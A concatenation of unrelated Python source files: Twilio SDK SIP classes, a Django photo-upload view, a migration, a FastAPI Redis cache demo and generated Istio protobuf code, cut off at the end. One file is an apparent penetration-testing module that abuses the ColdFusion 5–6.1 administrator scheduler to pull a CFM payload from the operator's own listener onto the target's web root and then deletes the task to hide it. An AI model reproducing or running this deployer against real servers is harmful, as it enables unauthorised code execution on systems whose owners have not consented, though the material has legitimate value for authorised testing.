:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
"""
resource_url = self._version.absolute_url(self._uri)
if not target_url.startswith(resource_url):
raise TwilioException('Invalid target_url for CredentialListMappingInstance resource.')
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return CredentialListMappingPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a CredentialListMappingContext
:param sid: The sid
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
return CredentialListMappingContext(
self._version,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a CredentialListMappingContext
:param sid: The sid
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
return CredentialListMappingContext(
self._version,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.CredentialListMappingList>'
class CredentialListMappingPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the CredentialListMappingPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: The account_sid
:param domain_sid: A string that uniquely identifies the SIP Domain
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
"""
super(CredentialListMappingPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of CredentialListMappingInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
return CredentialListMappingInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.CredentialListMappingPage>'
class CredentialListMappingContext(InstanceContext):
def __init__(self, version, account_sid, domain_sid, sid):
"""
Initialize the CredentialListMappingContext
:param Version version: Version that contains the resource
:param account_sid: The account_sid
:param domain_sid: The domain_sid
:param sid: The sid
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
super(CredentialListMappingContext, self).__init__(version)
# Path Solution
self._solution = {
'account_sid': account_sid,
'domain_sid': domain_sid,
'sid': sid,
}
self._uri = '/Accounts/{account_sid}/SIP/Domains/{domain_sid}/CredentialListMappings/{sid}.json'.format(**self._solution)
def fetch(self):
"""
Fetch a CredentialListMappingInstance
:returns: Fetched CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return CredentialListMappingInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the CredentialListMappingInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete('delete', self._uri)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.CredentialListMappingContext {}>'.format(context)
class CredentialListMappingInstance(InstanceResource):
def __init__(self, version, payload, account_sid, domain_sid, sid=None):
"""
Initialize the CredentialListMappingInstance
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
super(CredentialListMappingInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload['account_sid'],
'date_created': deserialize.rfc2822_datetime(payload['date_created']),
'date_updated': deserialize.rfc2822_datetime(payload['date_updated']),
'friendly_name': payload['friendly_name'],
'sid': payload['sid'],
'uri': payload['uri'],
'subresource_uris': payload['subresource_uris'],
}
# Context
self._context = None
self._solution = {
'account_sid': account_sid,
'domain_sid': domain_sid,
'sid': sid or self._properties['sid'],
}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: CredentialListMappingContext for this CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
if self._context is None:
self._context = CredentialListMappingContext(
self._version,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def friendly_name(self):
"""
:returns: The friendly_name
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def uri(self):
"""
:returns: The uri
:rtype: unicode
"""
return self._properties['uri']
@property
def subresource_uris(self):
"""
:returns: The subresource_uris
:rtype: unicode
"""
return self._properties['subresource_uris']
def fetch(self):
"""
Fetch a CredentialListMappingInstance
:returns: Fetched CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
return self._proxy.fetch()
def delete(self):
"""
Deletes the CredentialListMappingInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.CredentialListMappingInstance {}>'.format(context)
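# Hedged usage sketch (not part of the generated source): with an authenticated
# twilio.rest.Client and a SIP domain SID, this resource is normally reached
# through the fluent API rather than instantiated directly.
def _example_list_credential_list_mappings(client, domain_sid):
    mappings = client.sip.domains(domain_sid).credential_list_mappings.list(limit=20)
    return [(mapping.sid, mapping.friendly_name) for mapping in mappings]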
|
py | 7dfaf2141340cd25cca67b0ac7ad16fe1d25b27f | from src.platform.coldfusion.interfaces import CINTERFACES
from src.platform.coldfusion.authenticate import checkAuth
from src.module.deploy_utils import _serve, waitServe, parse_war_path, killServe
from threading import Thread
from os.path import abspath
from re import findall
from time import sleep
from src.core.log import LOG
import utility
import state
title = CINTERFACES.CFM
versions = ['5.0', '6.0', '6.1']
def deploy(fingerengine, fingerprint):
""" Scheduled Task deployer for older versions; radically different
than newer systems, so it warrants its own deployer.
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)[0]
if not cookie:
utility.Msg("Could not get auth", LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(cfm_file))
utility.Msg("Fetching web root...", LOG.DEBUG)
root = fetch_webroot(dip, fingerprint, cookie)
if not root:
utility.Msg("Unable to fetch web root.", LOG.ERROR)
return
# create the scheduled task
utility.Msg("Web root found at %s" % root, LOG.DEBUG)
utility.Msg("Creating scheduled task...")
if not create_task(dip, fingerprint, cfm_file, root, cookie):
return
# invoke the task
utility.Msg("Task %s created, invoking..." % cfm_file)
run_task(dip, fingerprint, cfm_path, cookie)
# cleanup
utility.Msg("Cleaning up...")
if not delete_task(dip, fingerprint, cfm_file, cookie):
utility.Msg("Failed to remove task. May require manual removal.", LOG.ERROR)
def create_task(ip, fingerprint, cfm_file, root, cookie):
""" Generate a new task; all parameters are necessary, unfortunately
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm'
if fingerprint.version in ['5.0']:
data = {
"taskNameOrig" : "",
"TaskName" : cfm_file,
"StartDate" : "01/01/2020",
"EndDate" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:05",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"Port" : state.external_port,
"ScheduledURL" : "http://{0}/{1}".format(utility.local_address(), cfm_file),
"Username" : "",
"Password" : "",
"RequestTimeout" : "10",
"ProxyServer" : "",
"HttpProxyPort" : "23",
"Publish" : "1",
"filePath" : root,
"File" : cfm_file.replace('cfml', 'cfm'),
"adminsubmit" : "Submit+Changes"
}
else:
data = {
"TaskName" : cfm_file,
"Start_Date" : "Jan 2, 2020",
"End_Date" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:50",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval_hour" : "0",
"customInterval_min" : "0",
"customInterval_sec" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, cfm_file),
"Username" : "",
"Password" : "",
"Request_Time_out" : "",
"proxy_server" : "",
"http_proxy_port" : "",
"publish" : "1",
"publish_file" : root + "\\" + cfm_file,
"adminsubmit" : "Submit",
"taskNameOrig" : ""
}
response = utility.requests_post(base+uri, data=data, cookies=cookie)
if response.status_code == 200:
return True
def run_task(ip, fingerprint, cfm_path, cookie):
""" Invoke the task and wait for the server to fetch it
"""
success = False
cfm_file = parse_war_path(cfm_path, True)
# start up our listener
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/scheduler/runtask.cfm?task=%s' % cfm_file
else:
uri = '/CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=%s'\
% cfm_file
response = utility.requests_get(base + uri, cookies=cookie)
if waitServe(server_thread):
if fingerprint.version in ['5.0']:
out_diag = "{0} deployed to /{0}".format(cfm_file.replace('cfml','cfm'))
else:
out_diag = "{0} deployed to /CFIDE/{0}".format(cfm_file)
utility.Msg(out_diag, LOG.SUCCESS)
success = True
killServe()
return success
def delete_task(ip, fingerprint, cfm_file, cookie):
"""
"""
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/deletetask.cfm'
data = {
"deletesubmit" : "Yes",
"task" : cfm_file
}
response = utility.requests_post(base + uri, data=data, cookies=cookie)
if response.status_code == 200:
return True
def fetch_webroot(ip, fingerprint, cookie):
""" Fetch the webroot for the CF server; this is where our
payload is stashed
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = "/CFIDE/administrator/server_settings/mappings.cfm?mapname=/"
else:
uri = '/CFIDE/administrator/settings/mappings.cfm?mapname=/CFIDE'
response = utility.requests_get(base+uri, cookies=cookie)
if response.status_code == 200:
if fingerprint.version in ['5.0']:
data = findall("name=\"DirectoryPath\" value=\"(.*?)\"",
response.content)
if data and len(data) > 0:
data = data[0]
else:
data = findall("<td nowrap><font class=\"label\"> (.*?) ",
response.content)
if data and len(data) > 0:
data = data[1]
if data:
return data |
py | 7dfaf2b05cf42b40523cd1f337b7553389b1aeff | import json
import logging
from io import BytesIO
from django.contrib.auth.decorators import login_required
from django.http.response import HttpResponse
from django.views.decorators.http import (require_GET, require_http_methods,
require_POST)
from PIL import Image, ImageFile
from pm.form.photo import (MultiplePhotosUpdateForm, PhotoCheckForm,
PhotoUpdateForm)
from pm.models.photo import Photo
from pm.view import set_cookie, update_used_space
from pm.view.authentication import is_authorized
from .message import error, success
ImageFile.MAXBLOCK = 2 ** 20
logger = logging.getLogger(__name__)
LONGEST_SIDE_THUMB = 100
LONGEST_SIDE = 1200
def get_size(original):
return len(original)
def calculate_size(longest_side, other_side, limit):
resize_factor = limit / float(longest_side)
return (limit, int(resize_factor * other_side))
def resize(size, limit):
if size[0] >= size[1]:
size = calculate_size(size[0], size[1], limit)
else:
size = calculate_size(size[1], size[0], limit)
return size
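# Hedged worked example: both orientations come back with the longest side first,
# scaled to the 1200 px limit while preserving the aspect ratio.
def _example_resize():
    assert resize((4000, 3000), LONGEST_SIDE) == (1200, 900)  # landscape input
    assert resize((3000, 4000), LONGEST_SIDE) == (1200, 900)  # portrait input (sides reported longest-first)
    return resize((4000, 3000), LONGEST_SIDE)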
def create_thumb(buf):
image = Image.open(buf)
size = image.size
thumb = BytesIO()
thumb_size = resize(size, LONGEST_SIDE_THUMB)
logger.debug("Resizing thumbnail to %s." % str(thumb_size))
image.resize(thumb_size).save(thumb, "JPEG", optimize=True)
thumb.seek(0)
if size[0] > LONGEST_SIDE or size[1] > LONGEST_SIDE:
original_size = resize(size, LONGEST_SIDE)
logger.debug("Resizing photo to %s." % str(original_size))
image = image.resize(original_size)
original = BytesIO()
# TODO This likely breaks the size calculation.
image.save(original, "JPEG", quality=80,
optimize=True, progressive=True)
original.seek(0)
return original.getvalue(), thumb.getvalue()
@login_required
@require_POST
def insert(request):
logger.info("Request files %s; Request post %s" %
(request.FILES, request.POST))
form = PhotoCheckForm(request.POST, request.FILES, auto_id=False)
if form.is_valid():
place = form.cleaned_data["place"]
logger.info("User %d is trying to insert a new Photo into Place %d." % (
request.user.pk, place.pk))
# ===================================================================
# check place
# ===================================================================
if not is_authorized(place, request.user):
logger.warn("User %s not authorized to insert a new Photo in Place %d. Aborting." % (
request.user, place.pk))
return error("This is not your place!")
# ===================================================================
# check & convert image
# ===================================================================
try:
original, thumb = create_thumb(request.FILES["photo"])
except Exception as e:
logger.error("Could not create thumb. Reason: %s", str(e))
return error(str(e))
# ===================================================================
# check upload limit
# ===================================================================
size = get_size(original)
userprofile = request.user.userprofile
if userprofile.used_space + size > userprofile.quota:
return error("No more space left. Delete or resize some older photos.")
photo = Photo(**form.cleaned_data, order=0, size=size)
# Necessary to avoid "multiple values for argument" error
photo.photo = original
photo.thumb = thumb
userprofile.used_space += photo.size
userprofile.save()
photo.save()
logger.info("Photo %d inserted with order %d and size %d." %
(photo.pk, photo.order, photo.size))
response = success(photo)
set_cookie(response, "used_space", userprofile.used_space)
return response
else:
return error(str(form.errors))
@require_GET
def get_photo_or_thumb(request, photo_id):
print("Trying to find %s" % (photo_id, ))
photo = Photo.objects.get(uuid=photo_id)
if 'thumb' in request.path:
image = photo.thumb
elif 'photo' in request.path:
image = photo.photo
else:
raise ValueError("Unrecognized path %s" % (request.path, ))
return HttpResponse(bytes(image), content_type="image/jpeg")
@login_required
@require_POST
def update(request, photo_id):
form = PhotoUpdateForm(request.POST)
if form.is_valid():
photo = None
try:
photo_id = int(photo_id)
# TODO we need to update the used_space cookie
logger.info("User %d is trying to update Photo %d." %
(request.user.pk, photo_id))
photo = Photo.objects.get(pk=photo_id)
if not is_authorized(photo, request.user):
logger.warn("User %s not authorized to update Photo %d. Aborting." % (
request.user, photo_id))
return error("not your photo")
except Photo.DoesNotExist:
logger.warn("Photo %d does not exist. Aborting." % photo_id)
return error("photo does not exist")
form = PhotoUpdateForm(request.POST, instance=photo)
form.save()
logger.info("Photo %d updated." % photo_id)
return success()
else:
return error(str(form.errors))
@login_required
@require_POST
def update_multiple(request):
try:
json_photos = json.loads(request.POST["photos"])
if len(json_photos) == 0:
return error("The array of photo is empty")
# Collected instances first and update them in one go.
# This way it is not possible to leave the Db in an inconsistent state.
photos_dirty = []
# Check all photos_dirty
for json_photo in json_photos:
form = MultiplePhotosUpdateForm(json_photo)
# fields are incomplete or invalid
if not form.is_valid():
return error(str(form.errors))
# Id cannot be retrieved from form.cleaned_data
photo_id = int(form.data["id"])
photo = Photo.objects.get(pk=photo_id)
# photo does not belong to the user
if not is_authorized(photo, request.user):
logger.warn("User %s not authorized to update Photo %d. Aborting." % (
request.user, photo_id))
return error("not your photo")
photos_dirty.append((photo, json_photo))
except Exception as e:
logger.error("Something unexpected happened: %s" % str(e))
return error(str(e))
# Update all photos in one go.
for (photo, json_photo) in photos_dirty:
logger.info("User %d is trying to update Photo %d." %
(request.user.pk, photo.pk))
form = MultiplePhotosUpdateForm(json_photo, instance=photo)
assert form.is_valid() # we checked this before. this must be valid
form.save()
logger.info("Photo %d updated." % photo.pk)
return success()
@login_required
@require_http_methods(["DELETE"])
def delete(request, photo_id):
try:
photo_id = int(photo_id)
logger.info("User %d is trying to delete Photo %d." %
(request.user.pk, photo_id))
photo = Photo.objects.get(pk=photo_id)
if not is_authorized(photo, request.user):
logger.warn("User %s not authorized to delete Photo %d. Aborting." % (
request.user, photo_id))
return error("not your photo")
used_space = update_used_space(request.user, -1 * photo.size)
logger.info("Photo %d deleted." % photo_id)
photo.delete()
response = success()
set_cookie(response, "used_space", used_space)
return response
except (KeyError, Photo.DoesNotExist) as e:
logger.error("Something unexpected happened: %s" % str(e))
return error(str(e))
|
py | 7dfaf2baab3984f276aac10ebd638e26d1a6025a | # Generated by Django 3.1.6 on 2021-05-17 13:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0014_doctordata_username'),
]
operations = [
migrations.AddField(
model_name='patient_appointment',
name='doctorusername',
field=models.CharField(default='', max_length=50),
),
]
|
py | 7dfaf31c0160d5ab2bba4dced6abbb47f30b1421 | import os
from datetime import datetime
import redis
from fastapi import FastAPI, Request, Response
from fastapi.responses import JSONResponse
from authx import HTTPCache, cache, invalidate_cache
REDIS_URL = os.environ.get("REDIS_URL", "redis://localhost:6379/1")
redis_client = redis.Redis.from_url(REDIS_URL)
class User:
id: str = "112358"
user = User()
app = FastAPI(
title="FastAPI Cache Example",
description="This is a FastAPI cache example",
version="0.1.0",
)
HTTPCache.init(redis_url=REDIS_URL, namespace="test_namespace")
@app.get("/b/home")
@cache(key="b.home", ttl_in_seconds=180)
async def home(request: Request, response: Response):
return JSONResponse({"page": "home", "datetime": str(datetime.utcnow())})
@app.get("/b/logged-in")
@cache(key="b.logged_in.{}", obj="user", obj_attr="id")
async def logged_in(request: Request, response: Response, user=user):
return JSONResponse(
{"page": "home", "user": user.id, "datetime": str(datetime.utcnow())}
)
@app.post("/b/logged-in")
@invalidate_cache(
key="b.logged_in.{}", obj="user", obj_attr="id", namespace="test_namespace"
)
async def post_logged_in(request: Request, response: Response, user=user):
return JSONResponse(
{"page": "home", "user": user.id, "datetime": str(datetime.utcnow())}
)
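# Hedged local-run sketch (assumes uvicorn is installed and a Redis server is
# reachable at REDIS_URL): start the app, then request /b/home twice within the
# 180 s TTL to see the cached timestamp being reused.
if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, host="127.0.0.1", port=8000)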
|
py | 7dfaf394aa23390248a8447cb1c901988533d4af | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: mesh/v1alpha1/network.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='mesh/v1alpha1/network.proto',
package='istio.mesh.v1alpha1',
syntax='proto3',
serialized_options=_b('Z\032istio.io/api/mesh/v1alpha1'),
serialized_pb=_b('\n\x1bmesh/v1alpha1/network.proto\x12\x13istio.mesh.v1alpha1\x1a\x1fgoogle/api/field_behavior.proto\"\xd7\x02\n\x07Network\x12\x45\n\tendpoints\x18\x02 \x03(\x0b\x32-.istio.mesh.v1alpha1.Network.NetworkEndpointsB\x03\xe0\x41\x02\x12G\n\x08gateways\x18\x03 \x03(\x0b\x32\x30.istio.mesh.v1alpha1.Network.IstioNetworkGatewayB\x03\xe0\x41\x02\x1a\x46\n\x10NetworkEndpoints\x12\x13\n\tfrom_cidr\x18\x01 \x01(\tH\x00\x12\x17\n\rfrom_registry\x18\x02 \x01(\tH\x00\x42\x04\n\x02ne\x1at\n\x13IstioNetworkGateway\x12\x1f\n\x15registry_service_name\x18\x01 \x01(\tH\x00\x12\x11\n\x07\x61\x64\x64ress\x18\x02 \x01(\tH\x00\x12\x11\n\x04port\x18\x03 \x01(\rB\x03\xe0\x41\x02\x12\x10\n\x08locality\x18\x04 \x01(\tB\x04\n\x02gw\"\xa5\x01\n\x0cMeshNetworks\x12\x46\n\x08networks\x18\x01 \x03(\x0b\x32/.istio.mesh.v1alpha1.MeshNetworks.NetworksEntryB\x03\xe0\x41\x02\x1aM\n\rNetworksEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.istio.mesh.v1alpha1.Network:\x02\x38\x01\x42\x1cZ\x1aistio.io/api/mesh/v1alpha1b\x06proto3')
,
dependencies=[google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,])
_NETWORK_NETWORKENDPOINTS = _descriptor.Descriptor(
name='NetworkEndpoints',
full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='from_cidr', full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints.from_cidr', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='from_registry', full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints.from_registry', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='ne', full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints.ne',
index=0, containing_type=None, fields=[]),
],
serialized_start=241,
serialized_end=311,
)
_NETWORK_ISTIONETWORKGATEWAY = _descriptor.Descriptor(
name='IstioNetworkGateway',
full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='registry_service_name', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.registry_service_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='address', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.address', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='port', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.port', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='locality', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.locality', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='gw', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.gw',
index=0, containing_type=None, fields=[]),
],
serialized_start=313,
serialized_end=429,
)
_NETWORK = _descriptor.Descriptor(
name='Network',
full_name='istio.mesh.v1alpha1.Network',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='endpoints', full_name='istio.mesh.v1alpha1.Network.endpoints', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateways', full_name='istio.mesh.v1alpha1.Network.gateways', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_NETWORK_NETWORKENDPOINTS, _NETWORK_ISTIONETWORKGATEWAY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=86,
serialized_end=429,
)
_MESHNETWORKS_NETWORKSENTRY = _descriptor.Descriptor(
name='NetworksEntry',
full_name='istio.mesh.v1alpha1.MeshNetworks.NetworksEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='istio.mesh.v1alpha1.MeshNetworks.NetworksEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='istio.mesh.v1alpha1.MeshNetworks.NetworksEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=520,
serialized_end=597,
)
_MESHNETWORKS = _descriptor.Descriptor(
name='MeshNetworks',
full_name='istio.mesh.v1alpha1.MeshNetworks',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='networks', full_name='istio.mesh.v1alpha1.MeshNetworks.networks', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_MESHNETWORKS_NETWORKSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=432,
serialized_end=597,
)
_NETWORK_NETWORKENDPOINTS.containing_type = _NETWORK
_NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne'].fields.append(
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_cidr'])
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_cidr'].containing_oneof = _NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne']
_NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne'].fields.append(
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_registry'])
_NETWORK_NETWORKENDPOINTS.fields_by_name['from_registry'].containing_oneof = _NETWORK_NETWORKENDPOINTS.oneofs_by_name['ne']
_NETWORK_ISTIONETWORKGATEWAY.containing_type = _NETWORK
_NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw'].fields.append(
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['registry_service_name'])
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['registry_service_name'].containing_oneof = _NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw']
_NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw'].fields.append(
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['address'])
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['address'].containing_oneof = _NETWORK_ISTIONETWORKGATEWAY.oneofs_by_name['gw']
_NETWORK.fields_by_name['endpoints'].message_type = _NETWORK_NETWORKENDPOINTS
_NETWORK.fields_by_name['gateways'].message_type = _NETWORK_ISTIONETWORKGATEWAY
_MESHNETWORKS_NETWORKSENTRY.fields_by_name['value'].message_type = _NETWORK
_MESHNETWORKS_NETWORKSENTRY.containing_type = _MESHNETWORKS
_MESHNETWORKS.fields_by_name['networks'].message_type = _MESHNETWORKS_NETWORKSENTRY
DESCRIPTOR.message_types_by_name['Network'] = _NETWORK
DESCRIPTOR.message_types_by_name['MeshNetworks'] = _MESHNETWORKS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Network = _reflection.GeneratedProtocolMessageType('Network', (_message.Message,), {
'NetworkEndpoints' : _reflection.GeneratedProtocolMessageType('NetworkEndpoints', (_message.Message,), {
'DESCRIPTOR' : _NETWORK_NETWORKENDPOINTS,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.Network.NetworkEndpoints)
})
,
'IstioNetworkGateway' : _reflection.GeneratedProtocolMessageType('IstioNetworkGateway', (_message.Message,), {
